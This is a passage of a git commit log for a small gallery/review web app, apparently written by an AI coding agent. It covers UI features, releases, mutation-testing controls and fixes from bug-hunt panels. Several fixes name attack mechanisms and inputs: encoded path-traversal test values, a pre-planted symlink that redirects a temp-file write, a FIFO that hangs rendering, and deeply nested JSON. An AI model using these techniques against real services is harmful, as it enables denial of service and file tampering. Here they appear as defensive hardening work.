between agents.
2026-09-23 07:11:53 -07:00
vh dfd806aa9f docs(booth.html): name the .rail cross-file contract at the selector that depends on it
The SVOS retheme makes .rail load-bearing in two files owned by two different
agents: this template's grid-cursor start, and base.html's --rail-h measuring
script that publishes the rail's height for scroll-margin-top (the rail wraps,
so no CSS number can know it).

Neither breaks loudly if it is renamed. Ours starts the cursor one tile too
high; theirs falls back to a fixed guess. design-dev's sheet carries the mirror
of this note above the .rail rule, so the coupling is documented from both ends
rather than from whichever side happened to notice.
2026-09-23 06:57:32 -07:00
vh 06d83dfd2f memory: the staged design-dev ref moves — read it, do not trust a SHA written here
He rebases onto our main and rewrites the ref in place; it has already gone
878ed86 -> a99b7bb. Merging a SHA copied out of the memory file would merge a
pre-rebase branch that predates both his scroll-margin fix and our bug-hunt
batch.

Third instance of one class today: a 'PUSHED' row that was stale when written, a
postbox send-note promoted into durable memory, and now a moving ref recorded by
SHA. The file records what was true when written; anything that moves needs a
command, not a value.
2026-09-23 06:53:29 -07:00
vh 1826d19a1f memory: the bug-hunt panel, the raw-first fragment trap, and five vacuous falsifiers
The mechanic worth keeping: browsers match a URL fragment against element ids
RAW first and percent-decoded only second, so a raw rel on both the anchor and
the id is ambiguous rather than merely unencoded — and encoding one side only
relocates the collision.

The count worth keeping: five falsifiers in one unit were green under the exact
change they forbade, three arms finding the same one independently. A
guard-strength pass is the highest-value part of a panel on a diff that is
already well tested, because the findings sit in the gaps the comments are most
confident about.
2026-09-23 00:06:26 -07:00
vh 397ea89795 fix(u7): six defects from the heid bug-hunt panel, and five vacuous falsifiers
Cross-frontier panel (Gróa/Hulda/Regin/Kimi) on U7's diff, thread
01M368G2Y0JMTJ2T7M3JMTXV5Z. Four of the six fixes are for defects no test in
this repo could have caught, and the panel's guard-strength passes found five of
my own falsifiers green under the exact change they forbade.

THE 4-OF-4 FINDING — the group anchor could land on the WRONG artifact.
The anchor was the raw rel spliced into an href fragment while the tile id was
equally raw. A browser matches a fragment against ids RAW FIRST and only then
percent-decoded, so raw-on-both-sides is not merely unencoded, it is AMBIGUOUS:
with `a b.png` and `a%20b.png` in one booth, the first's href resolves to the
fragment `item-a%20b.png` and the raw pass matches the SECOND file's id. That is
the misfiled-judgment failure invariant 6 exists to prevent, arriving through a
path invariant 6 never looked at. Both sides now use `Item.url`
(`quote(rel, safe="/")`), which is injective here and is the convention
booth_flag has always used. The original test asserted the href occurred as SOME
id on the page — true while pointing at the wrong one.

GRÓA'S STRONGEST SOLO — a zero-hit filter removed the way back.
The rail was gated on the FILTERED list, so a valid filter with no matches
removed the rail, the filter links and the route back to `all`, while the
empty-booth branch announced the booth was empty with rail.total still holding
the real count. No recovery without editing the address bar, and it degraded the
same way with JavaScript off, on the surface the operator actually reviews on.
Gated on all_items now, with an explicit no-match row.

HULDA — one unrepresentable filename took out the INDEX, not just its booth.
A non-UTF-8 filename reaches CPython as a surrogate and quote() raises on it,
outside any per-item handler. booth_items feeds list_booths, so one 0xff byte in
one booth's filename 500s every booth's card. Such a file cannot be linked,
served or zipped, so it is skipped like a dotfile.

HULDA — the `f` shortcut has never worked. The selector named `.flagbtn`, which
nothing in this repo emits, so it fell through to the hidden target input;
clicking a hidden input does not submit its form, and the handler called
preventDefault anyway. Now clicks the flag form's real button, verified end to
end in a real browser.

GRÓA — a group jump was undone by the next keypress. The jump scrolls, the
cursor stayed at -1, and the next arrow focused tile 0 and scrolled back. The
cursor now picks up from the viewport, which also fixes the general
scroll-then-arrow case. Asserted on real scroll geometry in Chromium.

HULDA — the caption sidecar was read whole before being truncated, so a
pathological file was a MemoryError the OSError handler does not catch. Bounded
at the read, and deliberately NOT by st_size: a FIFO reports 0.

ACCEPTED KNOWN RISKS, both now documented rather than implied: no cap on rail
row count (1,000 groups of two would render 1,000 rows; the largest live booth
is 66 items and picking a cap without a booth that needs one is invented work),
and Item.group sits mid-dataclass (one construction site, keyword-only, grepped).
The docstring now names the UPPER median explicitly — two arms flagged that
"the middle group" admits both readings for an even count.

FIVE VACUOUS FALSIFIERS, found by the arms and not by me: the anchor test
survived v[0]->v[-1]; the informativeness guard survived sizes[-1]; the group
count survived len(v)+1; the zero-hit filter test used a fixture that HAD hits;
and the escaping test asserted over the whole page, so it went red on a code
comment. All rewritten, all mutation-proved. The table is up to 20 rows and one
drifted when I changed the line under it — reported by the harness, not silently
skipped, which is the behaviour tests/test_mutation_check.py exists to hold.

660 green; 20/20 proved. Deployed; 21/21 booths 200.

Held for design-dev, not fixed here: Gróa's finding that the sticky rail has no
scroll-margin, so a fragment jump tucks the target under it. It is one line in
base.html, the file he is rewriting from scratch.
2026-09-23 00:04:59 -07:00
vh 6042d10bf3 memory: the SVOS concept round is with the operator, and a latent CSS defect it surfaced
Three rulings open on booth-svos-retheme (ship / voice / emblem). The branch is
an inert ref; merge is gated on the rulings. Verified independently: nothing
checked out, main clean, merge-tree clean, merged tree 649 green.

The fixup hold is now partial — booth.html is released because design-dev does
not touch it, so bug-hunt findings there land immediately.

And a real one he caught on our side: base.html reads four CSS custom properties
and defines none of them, 15 uses without a fallback. An undefined var makes the
whole declaration invalid at computed-value time, so those buttons have had no
border at all and a transparent background — not merely default colours. The U7
rail reads the same names with fallbacks, which is why the rail looked
deliberate and the buttons under it never did. Assigned to his rewrite; fixing
it on main would collide with the one file he is rewriting.
2026-09-22 22:18:56 -07:00
vh 33e7149e24 fix(scripts): the mutation harness must not churn source mtimes
It rewrites a tracked file and restores it byte-for-byte — but the restore
bumped the mtime, and in this repo that is not cosmetic. The repo IS the
deployment root and nothing takes effect until the service restarts, so 'is
:8090 stale?' is answered by comparing the service's start time against source
mtimes. A tool that moves those without changing a byte makes that check lie:
it reported the live service 16 minutes stale while it was serving current code.

Restores atime/mtime with os.utime, with a test whose defeating change is
dropping that line. Found by using the staleness check for real, not by review.

649 green; 12/12 U7 falsifiers still proved.
2026-09-22 22:01:35 -07:00
vh c47b3dba7e memory: pushed v1.0.0b1, and a 'PUSHED' row that was stale when written
main and the annotated v1.0.0b1 tag are on origin; ahead 0, behind 0.

The push carried SIX commits, not the five this session produced: 2f85692 from
the previous session was still unpushed while the memory row above it said
PUSHED. A push is a point in time and this file is not, so the row now says to
run git rev-list rather than to believe it — the same class of error as
promoting a postbox send note into durable memory, twice in one day.
2026-09-22 21:58:46 -07:00
vh 2f6a0ee821 test: keep the mutation harness — scripts/mutation_check.py, with its own controls
Promotes the session-scratchpad harness that proved U7's twelve falsifiers into
a repo tool, on the operator's call. No version bump: test tooling and docs, no
production-code change, per the SemVer SKIP list.

A green test is not evidence. A test that has never seen its own defeating
change may pass under it too, forbidding nothing while reading as though it
forbids something. This repo shipped that three times — twice in one session,
and once an hour after writing the persistent-memory entry about it. Prose in a
memory file is not an instrument.

Tables live in tests/mutations/*.toml, one per unit, committed so a unit's
proofs are an artifact rather than terminal scrollback. Adding a unit means
adding a file, never editing the script. u7_navigation.toml was generated from
the harness that proved those twelve, not retyped, and every anchor was verified
against the source before it landed.

THE TOOL GETS ITS OWN POSITIVE AND NEGATIVE CONTROLS, which is the point. It
shipped two defects in one session, each of which made it report a falsifier
PROVED WITHOUT RUNNING IT, and both were found by accident rather than by
anything checking:

  no green baseline — a test that is ALREADY red reports red for every mutation
  thrown at it, so a broken assertion reads as a certified falsifier

  the bytecode cache — `< 2` -> `< 1` is byte-identical in size, and CPython
  validates a .pyc against the source's (mtime, size) at one-second granularity,
  so a mutation landing in the same second as the revert before it runs against
  cached bytecode; the tell was a verdict flipping between consecutive identical
  runs

tests/test_mutation_check.py now carries a control for each, plus the one
usually skipped: a KNOWN-VACUOUS falsifier the tool must catch. An instrument
that only ever sees unknowns cannot tell "nothing wrong here" from "I am blind",
and twelve `proved` lines from a blind instrument are worth nothing.

Also hardens the tool against itself: it writes to tracked source files, so the
restore is verified rather than assumed, and a .mutation-inflight marker makes a
run killed mid-mutation refuse the next start instead of silently measuring a
mutated tree.

648 tests green; 12/12 U7 falsifiers still proved.
2026-09-22 21:58:12 -07:00
vh 82ac7c44e4 docs: design-dev accepted the SVOS retrofit — the /vor-ui brief is declined, and why
The ROADMAP row requiring a /vor-ui brief predates the IA doc. With that doc,
the landed templates and the seven handoff constraints, a /vor-ui pass would
have cost the operator a serial Q&A to re-derive IA already measured. design-dev
made that argument and it is better than the row it overrides.

Also settles: we merge and restart; he works against a copy, never :8090; the
concept round goes to the operator; webfonts by CDN link with display=swap,
because the CDN-free property turned out to be accreted rather than an
invariant (checked CLAUDE.md, the non-goals and the IA doc).

Corrects a memory defect in the same commit: a postbox send note is a
point-in-time snapshot and one was promoted into persistent memory as a durable
fact about a handle's delivery mode. It was wrong within the hour.
2026-09-22 21:51:35 -07:00
vh 8a18dd13ab memory: snapshot — v1.0.0b1 cut, the version that was two copies, and the design-dev handoff 2026-09-22 21:41:56 -07:00
vh 3126deca00 chore(release): 1.0.0b1 — the v1 target, staged as a beta
All seven v1 capabilities are landed (ROADMAP's v1 target is met), so this is
the first release of the 1.x train. Staged as a beta rather than cut final on
the operator's call: per the canonical policy `-beta.N` means feature-complete,
external testing, no new features, focus is on bugs — which is exactly this
state, with a cross-frontier bug-hunt panel outstanding on U7's diff.

The repo learned this sequencing the hard way once: v0.2.0 was tagged and
announced while a contract panel was in flight, the panel found three defects in
the code just released, and v0.2.1 shipped within the hour. A beta is the
designed answer to that, not a workaround for it.

ALSO FIXES A SECOND COPY OF THE VERSION, found while cutting this one.
`booth.__version__` was the literal `0.1.0` and had been wrong through six
releases. It is now read from pyproject.toml — deliberately NOT from
importlib.metadata, which describes a different artifact: this repo has no build
step and no install step (booth.service runs uvicorn with WorkingDirectory set
to the tree), and the venv was carrying a vestigial booth-0.3.0.dist-info with
no package directory behind it. Installed metadata therefore reported 0.3.0 for
a tree at 1.0.0b1 — confidently wrong and varying by environment, which is worse
than a literal that at least fails the same way everywhere.

booth/__init__.py is also, it turns out, effectively stdlib-only: scripts/booth
imports booth.links / booth.marks / booth.manifest under the system python3 with
no venv, and every one of those executes the package root first. Nothing
asserted it. test_stdlib_only now covers __init__, and the no-venv import path
is verified under python3.11 reporting 1.0.0b1.

642 tests green.
2026-09-22 21:40:09 -07:00
vh bf351a26d1 feat(u7): filename groups — the last v1 unit, and a table that did not reproduce
Completes U7 with its fourth component: a jump-to-group rail derived from
filename prefixes, replacing the subfolder sections ROADMAP named. The scope
departure was ratified by the operator 2026-09-22; this commit deletes
test_no_group_rail_is_shipped_yet, the guard that held it back, in the same
change that builds what it guarded against.

All seven v1 capabilities are now landed. The 1.0 cut is a decision, not a
dependency, and it is the operator's — no version bump here, because a commit
is not a release.

THE RULE CHANGED AT IMPLEMENTATION, ON MEASURED GROUNDS. The contract specified
`strip ONE trailing run of digits`; run against the live set that yields 24
groups for sindra-bakeoff's 40 images and 27 for sindra's 30 — a rail with a row
per tile — because it keys on the END of the stem, where the instance number
lives. The contract's own table claimed 5 and 1 for those two booths and neither
reproduces; the numbers are reachable only by two OTHER heuristics, so the table
that justified the design was assembled from more than one rule. Its own worked
example contradicts it in plain sight.

The shipped rule keys on the first separator-delimited segment, where the family
lives, destemming only when the stem has no separator at all — so `ac01` -> `ac`
while `v30-seed8302` and `v35-seed8302` stay apart. Re-measured across all 17
live booths; the table is in the contract.

INV-3 GAINED ITS SECOND DEGENERACY. The contract guarded one group for
everything (sc-iso-spread: DSC0001-DSC0006). The live set's actual failure is
the opposite — pewpew-ui-brief yields 23 groups for 34 items, dfa-concepts 13
for 20 — and the contract as written would have shipped a rail that is a second
copy of the grid. The rail now renders only when grouping is informative: two or
more groups, and the middle group holding more than one item. That predicate
gets all 17 booths right.

Grouping is a VIEW. The grid stays sorted(rel) and the zoom ring stays that
order filtered to images; the group fixture interleaves across subdirectories
precisely so a (group, rel) re-sort goes red. Groups are derived from the
RENDERED list, not the full gallery, so no anchor points at a filtered-out tile.

booth/items.py       _group_of + Item.group, derived in the resolver (INV-1)
booth/app.py         _groups() builds the rail rows; build_gallery carries it
booth/templates/     the rail-groups nav and its CSS
tests/               +16 tests; 639 green

Every new falsifier was proved by running its defeating change (12/12). Three
were vacuous first time out: one fixture's positional order happened to be
alphabetical, one assertion miscounted elements, and the harness itself
certified a broken test twice — no green baseline, and byte-identical mutations
silently defeated by the pyc cache's one-second mtime granularity.
2026-09-22 21:33:54 -07:00
vh 2f85692e95 memory: a standing no-announcements ruling — the send is the operator's, not the agent's to ask about 2026-09-22 21:05:46 -07:00
vh 6938d21085 memory: the operator ruled on all five — U7's departure approved, main pushed
"accept all recs, or make good ones." Four of five executed.

APPROVED: drop subfolder sections for filename-prefix groups. The U7 contract
moves to APPROVED and ROADMAP's U7 row and deterministic-order table are
rewritten -- groups order by the position of their first member in sorted(rel).

SETTLED: `unanswered` means has-an-open-pick, the reading that shipped. The
has-no-mark-at-all reading is a different question and is parked to v1.1 rather
than left pending.

PUSHED: main and both release tags reached origin -- the first time this repo's
U6 work has existed anywhere but this box. Recorded because --follow-tags
carried neither tag: both are LIGHTWEIGHT per the SemVer policy and that flag
only follows annotated ones, so a lightweight release tag needs its own push.

NOT SENT: the 17-handle note was blocked by the auto-mode classifier because a
multi-recipient send is gated on explicit operator approval. The blanket ruling
ratifies the note's content, not that specific approval, and the gate held
correctly. Drafted in full with its recipient list at
docs/pending/fleet-note-booth-link-refusal.md so it survives a context clear.
Not worked around.

NOT SEEDED: "no seeding yet" was a specific prior instruction rather than a
recommendation of this session's, so the blanket acceptance does not overwrite
it.

⚠ The approval leaves a trap: test_no_group_rail_is_shipped_yet exists to stop
an UNAPPROVED group rail, and the rail is now approved. It has inverted and
must be deleted by whoever builds the rail, or it blocks correct work while
reading like a real invariant. Named in the handoff's first step for that
reason.
2026-09-22 19:49:39 -07:00
vh 8bf5343049 memory: snapshot — U7 three-quarters built, blocked on one ruling
U6 shipped as v0.6.0 and a late fix as v0.6.1; U7's three ratified components
(rail, filters, grid keyboard) are landed and the fourth is deliberately not,
because swapping subfolder sections for filename-derived groups is a scope
departure the operator has not ruled on. A test fails if anyone builds it
anyway.

Two new detail files. One decomposes U7 by ratified-versus-not and records the
two decisions taken under stated assumption. The other keeps the mechanism
behind today's misrouted directive: pane_find addresses seats by a ROLLING PANE
TITLE, which is not a stable address, and the failure is silent from the
sender's side -- Miranda had no signal until infra-ops flagged it. The incident
resolved; the mechanism did not.

The generated handoff committed the modality failure its own step-7 read exists
to catch: it listed push, seed and the 17-handle note as imperative Next steps
when all three are explicitly gated. Rewritten as do-nots, Next steps emptied.
Recorded here because it is the second time the generator has needed that
backstop.
2026-09-22 17:38:40 -07:00
vh a306e2dc6d feat(u7): the rail, the filters and the grid keyboard — the ratified three
ROADMAP's U7 row names four components. Three of them -- a sticky rail,
filters, and grid keyboard -- are already ratified there and are implemented
here. The fourth, replacing directory sections with filename-derived groups, is
a scope DEPARTURE the operator has not ruled on and is deliberately not built;
test_no_group_rail_is_shipped_yet fails the moment somebody builds it anyway,
so it cannot arrive by accident while he is away.

Filters are links carrying a query parameter, resolved server-side, so the
gallery keeps working with JavaScript off -- U3 already cost the verbatim path
its no-JS operation and said so, and the gallery is the surface the operator
actually reviews on. An unknown filter falls back to `all` rather than indexing
a dict by a value that arrives from an operator-editable URL.

`unanswered` means HAS AN OPEN PICK, the U4 hold predicate that already exists.
The other reading is a real and different question and stays open on the
contract rather than being guessed at.

Filtering is a VIEW and never reorders. The grid renders `sorted(rel)` with
non-matching items removed, so "the third one" means the same thing with a
filter on as with it off, and the zoom ring is untouched by any filter -- a
ring that changed with the grid would make `next` depend on how the operator
arrived, which is the misfiled-judgment failure invariant 6 exists for.

⚠ The first version of that invariant's test was VACUOUS and the mutation run
caught it: it compared each filtered view against the unfiltered RESPONSE, so a
reversing mutation reversed both sides and it stayed green under the exact
change it forbade. Rewritten against an independent truth -- U1 INV-3 says the
order IS sorted(rel) -- and re-verified RED. Written an hour after the entry
describing this exact failure class, which is worth recording.

611 -> 623 tests.
2026-09-22 14:45:57 -07:00
vh b50f41bb36 docs(u7): a PROPOSED contract for the last unit — scope departs from ROADMAP on measured grounds
Not approved and not implemented. Frontmatter status says so, the body says so
twice, and the one scope-direction call in it is named as the operator's.

ROADMAP's U7 row is sections, rail, filters, grid keyboard. The measurement
recorded in persistent-memory.d/2026-09-22-u7-remeasured-before-scoping.md
kills the first component -- zero of eleven gallery booths have a subdirectory,
and the only two booths that do are reports -- and supplies a replacement:
stripping a trailing digit-run from the filename stem yields 5 to 16 sensible
groups on four of the five large galleries.

The degenerate fifth is carried as a first-class case rather than an edge: one
group must render NO rail, because a navigation affordance that cannot navigate
is worse than none.

Closes ROADMAP's outstanding U7 ordering question: groups order by the position
of their first member in sorted(rel), so the rail reads in the same direction
as the grid. Grouping and filtering are views and never reorder -- INV-2 exists
because sorting by (group, rel) looks right and silently changes what 'the
third one' means, which is the misfiled-judgment failure invariant 6 was
written for.

Blast radius checked before writing: Item gains one field beside the existing
section, build_gallery carries it, and image_chain is explicitly unchanged.
2026-09-22 14:40:37 -07:00
vh e15ee2c4ab memory: U7 re-measured before scoping — pre-work only, no unit started
The standing instruction is to re-count the booths before scoping U7. Done
against the live 19-booth set, so the scope call is a short read rather than an
investigation.

Two findings. Sections are worth zero and it is now measured twice: not one of
the eleven gallery booths has a subdirectory, and the only two booths that do
are both reports, the job where grid navigation matters least. And the grouping
signal is in the filename rather than the tree -- stripping a trailing digit-run
yields 5 to 16 sensible groups on four of the five large galleries and
degenerates to one group on the fifth, while the competing split-on-second-
hyphen heuristic is useless everywhere.

The sizing case has also moved: the unit was scoped against 270-item booths and
the largest gallery is now 81 items / 40 images.

No U7 code and no U7 contract. The scope direction is the operator's call.
2026-09-22 14:38:26 -07:00
vh 400e254da6 memory: reconcile the snapshot to v0.6.1
The snapshot was written at v0.6.0 and the marks-guard fix landed after it.
Updates the in-flight head commit, the test count, and the ahead-of-origin
count so a fresh session is not told a stale number.
2026-09-22 14:35:53 -07:00
vh 1b394dde18 chore(release): v0.6.1 — the wrong-shaped answer no longer 500s
Patch, agent discretion. Bundles the pre-existing render-time 500 on the
gallery and marks pages, closed at the hydration boundary, plus the
`_safe_fragments` handler that could not survive the failure it was handling.

611 tests.
2026-09-22 14:35:28 -07:00
vh e702be4e1a fix: a wrong-shaped answer no longer 500s the gallery and the marks page
Pre-existing, measured at 42ea67f, so it predates U3. `_hydrate` checked only
that `answer` was a dict and never that `answer["answers"]` was one, so
`marks_for` and `hold_read` both reported the mark healthy with no read error
-- and `_ask_inline.html` then asked a list for `.get`. The v0.2.2 lesson was
half-implemented: that outage was a file that could not be PARSED and the
reader was made lenient, while this one parses perfectly and breaks one layer
further in, at render, where no leniency existed.

Closed at the hydration boundary rather than by a third copy of the guard --
one predicate, one place, every surface inherits it. Only the multi case is
checked, because only the multi case indexes; requiring `answers`
unconditionally would break every single-question pick, and that direction has
its own test. Measured before and after: gallery and marks pages 500 -> 200,
the error visible on the page, the booth's other healthy pick untouched.

The placement was the one open operator question of the session. It was
surfaced three times without a ruling, so it is taken under a stated assumption
and is cheap to move: the whole fix is one condition in one function.

Two things fell out of it worth more than the fix.

`_safe_fragments` no longer has a reachable natural trigger. Probed every wrong
answer shape a .marks.json can carry: `answers` as a list, a string or null all
become hydration errors now, and a wrong-typed value INSIDE `answers` renders
without raising, because Jinja absorbs attribute access on a non-mapping. U3's
guard is a pure backstop, and its test now says so and trips it synthetically
through the shared macro module rather than asserting a path nothing reaches.
A guard tested by an unreachable input is an untested guard.

And that guard's handler could not survive the failure it was handling: it
caught a raising `_pick_fragments` and rebuilt the broken-ask box through the
SAME macro module that had just raised, so whenever `whole` was the broken
thing it re-raised and took the whole report. Found by accident while building
the falsifier. Fixed, with its own test.

Both new falsifiers were verified RED against their defeating change rather
than assumed.

607 -> 611 tests.
2026-09-22 14:34:28 -07:00
vh c5ac49356f memory: snapshot — U6 released at v0.6.0, six of seven v1 units landed
Nothing in flight. The in-flight section is rewritten to the post-release
state and carries the five things a fresh session must not do: push (main is 8
ahead of origin/main), seed the registry, send the 17-handle note, run either
dated prediction early, or start U7 without re-counting the booths first.

Two new detail files: the release itself, and what each of the five review
passes could only see alone -- the strongest evidence this repo has for running
all of them rather than picking one. The earlier U6 entry is reconciled; it was
written while the gates were still out and said NOT TAGGED.

Restored in the rewrite: the warning that the 17 handles were never told `keep`
stopped meaning "waiting on an answer", which is load-bearing for how the
2026-10-06 re-count reads, and the fact that a remote now exists.
2026-09-22 14:24:12 -07:00
vh 3296a868fa chore(release): v0.6.0 — U6, benches
The sixth of seven v1 units. A bench is a running thing, registered: identity
is the normalized URL so re-posting updates the row instead of appending a
fifth, `booth link` refuses the one shape that now has a better home, and the
board marks the rows whose booths are gone without deleting a single one.

Minor rather than patch, approved by the operator. Two capabilities arrived and
one verb changed behaviour for seventeen agent handles, which is the
push-notification bar in the tier test: `booth bench` is new, the board gained
a dead marker, and `booth link` now refuses a booth URL and a credentialed one.

444 -> 607 tests across the unit and its three cold gates. All four review
gates closed: an in-session seam review (three real contract defects, including
one that would have 404'd the whole board page), an in-session adversarial pass
(four defects, one of them this repo's own FIFO lesson recurring in a new
file), and three cold cross-frontier panels -- contract paraphrase, code-vs-
contract, and a diff-scoped bug hunt -- folded in full with exactly one finding
declined and its reasoning recorded.

Measured before contracted, and the measurement changed the unit: the design
doc's headline 69% rot was two defects wearing one number, and U5 had already
closed the larger half. Identity is the FULL normalized URL rather than the
origin because origin identity merges eight distinct gitea repositories, three
unrelated model cards, and the two LRPG surfaces the design doc itself names as
an example of two real benches.
2026-09-22 14:21:23 -07:00
vh 8cb21193dc fix(u6): fold the cold bug-hunt panel — a div in a span, a symlink split, and an append outside its lock
/heid-bug-hunt panel 01M35CRRK2RTVWWF1BN09AFQG3, diff-scoped against 91fd8bc.
The most severe of the three rounds, and three of its four convergent findings
were already closed by our own adversarial pass before the reply landed. Three
were not.

- The benches panel was nested inside the booth header's <span class="sub">.
  The insertion had matched the first `{% if board %}` in the template rather
  than the block-level one. A div inside a span is invalid HTML: the parser
  closes the span implicitly and hoists the div out, orphaning the rest of the
  sub-line. Nothing 500s, which is precisely why no test in this suite could
  see it. Moved to block level, pinned by an offset assertion, and verified
  with a real HTML parser.

- _booth_exists used a bare is_dir() while resolve_booth resolves and requires
  the parent to BE the data root. They disagreed on a symlink: the marker
  called a booth pointing outside the root alive while the page 404s it, so the
  row rendered healthy and the link was dead. Same containment now, and
  ValueError joins OSError in the guard -- one bad row must never cost the
  other 220.

- The board append opened its fd OUTSIDE the lock. `flock LOCK printf ... >>
  board` reads as locked and is not: the shell opens the append fd while
  parsing, before flock acquires. A concurrent unlink replaces the inode via
  os.replace, the old fd still points at the unlinked one, and the append
  succeeds, reports success, and vanishes. Pre-existing rather than this
  unit's, but it is silent data loss in the file this unit lives in. Proved by
  holding the lock and asserting nothing is written.

- The atomic write used a predictable .tmp.<pid> name; a pre-planted symlink
  there redirects the write straight through the replace. mkstemp with O_EXCL
  in the same directory, and an fsync before the replace -- os.replace orders
  the rename, not the data behind it.

Declined and recorded: on a host where booth.links cannot be imported, `booth
link` now refuses every URL rather than only booth ones. True, and kept. A
guard that fails open is not a guard, and that state is a broken install in
which most of the CLI is equally broken.

The sharpest line in the reply is one three arms found independently: this repo
had ALREADY paid for the RecursionError class in marks.py, and the new module
re-introduced the unguarded parse. Reading the new module in isolation would
never have surfaced that.

604 -> 607 tests.
2026-09-22 14:20:06 -07:00
vh e3853e2692 docs(u6): the CLI usage strings carry the --apply <id> form
The three places scripts/booth documents itself -- the header block and both
usage lines -- still described a bare --apply, which is now refused. A usage
string that names a form the script rejects is worse than none.
2026-09-22 14:13:41 -07:00
vh 32e3ed65e1 fix(u6): fold the cold contract panel — the import selection gap, and a document arguing with itself
/heid-contract-review panel 01M35BWCJ806MT75NA630Y4WFH. The headline arrived
from all four arms independently and it is a missing feature, not a wording
problem.

`bench import --apply` registered every candidate, while the same contract says
roughly 14 of 35 are reference bookmarks that must stay on the board. There was
no selection mechanism between the dry-run report and the write -- so the write
path did the exact thing this unit's rationale calls impossible, tell a bench
from a bookmark by its URL, silently, to rows that belong where they are. The
report existed precisely because the decision is not mechanizable. `--apply`
now takes the ids the operator names; a bare `--apply` is refused and an
unknown id is refused, both writing nothing.

Two solo findings, both real:

- A successful registration could push the registry past the size its own
  reader refuses, so the LAST bench added would make every other bench
  invisible while reporting success. The writer now respects the reader's cap.
- The credential ban covered bench URLs and not `booth link`, the door this
  unit did not touch -- and the board renders on an unauthenticated LAN
  surface. A password can no longer reach it through either door. A small
  deliberate widening, named rather than smuggled.

Cap semantics were readable three ways (refuse / clip-for-display /
truncate-and-store) with a different build behind each, 4-of-4. Now stated per
field: name and owner truncate, url and state are refused at the write and are
DAMAGE at the read. url is not a display budget -- INV-7 promises the click
goes to the posted address byte for byte, and a clipped URL keeps that promise
in the type system while breaking it in the browser. The code had been clipping
it; fixed.

Two passages disagreed about one character: INV-7's specimen named "a trailing
slash on a non-empty path" as something normalization changes, while the rule
list keeps it and INV-6 makes the two spellings two benches. The rule list is
right; the specimen was wrong. Found by 3-of-4.

Also: INV-6's component list was illustrative where it had to be exhaustive and
was short scheme and port; "writes nothing" appeared twice with different
lists; the dead marker's predicate was readable two ways with 221 rows riding
on it; and INV-2's falsifier read as though three callers agreeing pinned
something, when three callers of one wrong predicate agree perfectly -- the
table's expected values are the real check and now say so.

597 -> 604 tests.
2026-09-22 14:12:36 -07:00
vh 8a7af3eb08 fix(u6): fold the cold code-review panel — four-arm convergence on three surface clauses
/heid-code-review panel 01M35CK8YKEKMV7T15JXEF6A8N, verdict NOT drift-zero.
Three findings arrived from all four arms independently, and they share a
shape: a contract clause written as prose and never converted into an
assertion. That is the lens working.

- The panel dropped the added date the contract promised to show.
- `bench ls` printed no ids, and the URL it printed was truncated to 52 columns
  so the line was not pasteable into `bench state|rm`. The test's docstring
  claimed it printed ids and asserted nothing of the kind.
- `bench import` printed the description instead of the raw URL beside each
  normalized id, hiding the collapse the clause exists to expose.
- An IPv6 literal lost its brackets: http://[::1]:8080/a normalized to
  http://::1:8080/a, a broken identity that no re-post can match. Bracketed
  literals are re-wrapped; an unbracketed one is refused rather than guessed.
- A deeply-nested JSON RecursionError escaped read_benches' except pair. The
  byte cap does not help -- 200k open brackets is 200 KB.
- An empty board hid the whole benches panel, registration form included.
- The link refusal classified by captured-text emptiness, which bash can erase;
  it now answers with a B:/N sentinel so no name reads as "not a booth".

INV-4's tie-break falsifier could not fail: _write_all serializes with
sort_keys=True, so both insertion orders came back already id-sorted and
removing the tie-break left the test green. It now calls order_benches
directly. Same class as the five vacuous U4 falsifiers, found by a cold reader
rather than by us.

Also from the arms' per-invariant vacuity pass: INV-6 had no vector pinning a
non-default port as part of the identity; INV-3 asserted only that links/ was
absent; INV-8's hashed sequence omitted a read verb; INV-9's AST walk is
defeated by a string import. All closed.

Contract amended where the code was right: `updated` means last mutation, the
id cap is write-only because the id is the locator controls post back, INV-8's
file list includes the lock sidecar it always mandated. Every line number is
out of the prose -- the panel found two already stale.

565 -> 593 tests. Nothing declined.
2026-09-22 13:50:40 -07:00
vh 0a2bb1d26c fix(u6): the booth check fails closed with a reason, and a dead write leaves no scratch
Two more from the in-session adversarial pass.

`booth link`'s new booth-URL check shells out to booth/links.py. When that
import cannot run, the command substitution under `set -e` aborted the script
with a bare ModuleNotFoundError traceback: the right DIRECTION (no row was
appended — a guard that fails open is not a guard) reached by accident, and
unactionable when it fires. Handled explicitly now: exit 3, and a message
naming what the check needs. The fail-closed direction is stated rather than
inherited from shell semantics, and a test pins it — the defeating change in
either direction goes red.

_write_all's scratch file was stranded beside the registry if the write died
between create and replace. Cleaned up on every exit path. The prior registry
was never at risk either way: os.replace is the only thing that publishes.

Also pins normalization idempotence, which `bench state <id|url>` and
`bench rm <id|url>` both rely on: they normalize whatever they are handed, so
an id that did not normalize to itself would miss the row it names.
2026-09-22 13:33:59 -07:00
vh 8c7f2127eb fix(u6): a FIFO at the registry path hung the render, and unquote leaked control characters
Both found by the in-session adversarial pass while the cold panels were still
out. The first is this repo's own 2026-09-22 lesson recurring in a new file.

_read_bytes bounded the READ and its docstring claimed that closed the
named-pipe hole. It does not: open() blocks on a FIFO with no writer, before
any byte cap can apply. read_benches runs on the board page's render path, so
one FIFO there is a request that never returns and, with enough hits, the
threadpool behind every route. Guarded with S_ISREG before the open, which is
what marks.py has done since it learned the same thing. The bounded read stays
for the case a stat cannot answer: a regular file that grew between the two.

booth_target handed back whatever unquote produced, including NUL and newline.
Neither can name a directory, and unfiltered they reach is_dir() -- which
raises ValueError on an embedded NUL, and ValueError is not an OSError, so it
escapes the dead marker's guard -- plus the refusal message the CLI prints and
the marker the board renders.

Both tests are written to go red under the exact change that defeats them: the
FIFO test blocks rather than fails if the regular-file check is removed, and
the control-character rows need their own case because %2e%2e and %2f stay
green without the clause.
2026-09-22 13:30:22 -07:00